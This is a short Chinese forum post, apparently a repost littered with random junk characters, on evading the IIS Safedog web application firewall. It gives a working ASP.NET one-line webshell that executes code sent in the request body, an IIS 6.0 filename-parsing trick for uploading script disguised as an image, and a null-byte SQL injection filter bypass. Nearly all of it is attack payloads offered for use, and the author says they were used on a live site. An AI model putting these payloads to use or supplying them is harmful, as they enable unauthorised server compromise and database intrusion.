1、绕过IIS安全狗的一句话。% n5 E& A& ~2 P
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。% M e' J+ Y7 u
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
' o) d+ {6 G( @4 h9 C) d+ Z1 n# l
2、IIS6.0解析漏洞遇到安全狗。
* l/ \$ i8 E% i! B3 ~0 ?文件名为
$ G! u: S6 _9 u F5 q/ o! }3 T8 D- ghttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
" @$ G5 y) y5 A( l, T) w3 p; o/ r8 s! K- C* L- U5 D. Q& j
这样的会被IIS安全狗果断屏蔽。
+ A0 ]7 p l7 H1 n8 F6 S改成如下名称,IIS6一样会解析:
1 ^; O* g b4 f: {) H: Mwww.xxxxx.com/;1.asp;1.jpg! Q7 @, y: ]5 V y1 k) n
1 [9 J( W* ?4 s" C7 ]3、安全狗的注入绕过。
. E5 t+ G3 O) B$ L' A( Y常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。3 h [$ ?0 F) T/ r: z5 ]" e- W
但如果:
& J9 E+ I3 G& L% U; @- f2 Z: Z& d& o+ `r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1& D, c' ~/ \2 Z3 P
就可以成功绕过了。7 Y6 E8 }! x( C5 x. _0 D9 G w3 A
$ D" n- }2 b% e2 S( _: I" M0 m
! `5 ~3 y& q; m) j" v5 o. F& p( Z |